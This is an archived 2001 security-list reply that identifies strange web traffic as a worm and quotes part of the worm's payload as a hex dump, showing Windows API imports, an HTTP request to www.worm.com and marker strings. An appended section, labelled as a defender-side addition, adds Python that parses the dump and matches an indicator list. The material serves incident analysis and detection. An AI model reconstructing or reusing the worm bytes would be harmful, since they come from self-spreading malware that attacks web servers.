Re: Strange web traffic

From: Ryan Russell (ryanat_private)
Date: Tue Jul 17 2001 - 13:03:39 PDT

    That is indeed a worm, though you're missing the first part of the
    conversation.
    
    This is the worm that Marc from eEye has been posting about; I saw a post
    to incidents about it arrive shortly before this one, forwarded from
    Aleph1.
    
    						Ryan
    
    On Tue, 17 Jul 2001, Scott Nursten wrote:
    
    > 0x01c0   2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f        *.L.3.........Lo
    > 0x01d0   6164 4c69 6272 6172 7941 0047 6574 5379        adLibraryA.GetSy
    > 0x01e0   7374 656d 5469 6d65 0043 7265 6174 6554        stemTime.CreateT
    > 0x01f0   6872 6561 6400 4372 6561 7465 4669 6c65        hread.CreateFile
    > 0x0200   4100 536c 6565 7000 4765 7453 7973 7465        A.Sleep.GetSyste
    > 0x0210   6d44 6566 6175 6c74 4c61 6e67 4944 0056        mDefaultLangID.V
    > 0x0220   6972 7475 616c 5072 6f74 6563 7400 0969        irtualProtect..i
    > 0x0230   6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053        nfocomm.dll.TcpS
    > 0x0240   6f63 6b53 656e 6400 0957 5332 5f33 322e        ockSend..WS2_32.
    > 0x0250   646c 6c00 736f 636b 6574 0063 6f6e 6e65        dll.socket.conne
    > 0x0260   6374 0073 656e 6400 7265 6376 0063 6c6f        ct.send.recv.clo
    > 0x0270   7365 736f 636b 6574 0009 7733 7376 632e        sesocket..w3svc.
    > 0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
    > 0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
    > 0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
    > 0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
    > 0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
    > 0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
    > 0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
    > 0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><
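
    As an added, defender-side example (not part of the thread), the Python below reassembles the bytes from the tcpdump -X style dump quoted above, lists the printable strings the way strings(1) would, and flags the payload strings readable in the ASCII column (www.worm.com, c:\notworm, LMTH). The eight dump lines are copied from the quoted message; the tcpdump -X layout and the assumption that lines are contiguous are mine.

```python
import re
from typing import List

# Constructed excerpt of the quoted dump (tcpdump -X style layout, "> " quote
# prefix kept). Raw string so "c:\notwo" keeps its literal backslash.
DUMP = r"""
> 0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
> 0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
> 0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
> 0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
> 0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
> 0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
> 0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
> 0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><
"""

# Payload strings visible in the dump above (all three are on the page).
INDICATORS = (b"www.worm.com", b"c:\\notworm", b"LMTH")
HEX_GROUP = re.compile(r"[0-9a-fA-F]{4}")

def parse_hex_dump(dump: str) -> bytes:
    """Reassemble raw bytes from a tcpdump -X style dump.

    Lines look like "0xOFFSET  g1 ... g8  <ascii>", optionally "> "-quoted.
    Only the up-to-eight 4-hex-digit groups are decoded; the ASCII column is
    ignored and lines are assumed contiguous (offsets are not re-ordered).
    """
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.lstrip("> ").split()
        if not tokens or not tokens[0].lower().startswith("0x"):
            continue
        groups = []
        for tok in tokens[1:9]:            # at most eight groups per line
            if not HEX_GROUP.fullmatch(tok):
                break                      # reached the ASCII column
            groups.append(tok)
        out += bytes.fromhex("".join(groups))
    return bytes(out)

def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return runs of printable ASCII of at least min_len, as strings(1) would."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def match_indicators(data: bytes) -> List[bytes]:
    """Which of the known payload strings occur in the reassembled bytes."""
    return [ioc for ioc in INDICATORS if ioc in data]
```

    Run against the full quoted dump, the same functions also surface the imported API names (LoadLibraryA, CreateThread, TcpSockSend, ...) as plain strings.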
    
    
    
    ----------------------------------------------------------------------------
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see:
    
    http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 13:59:03 PDT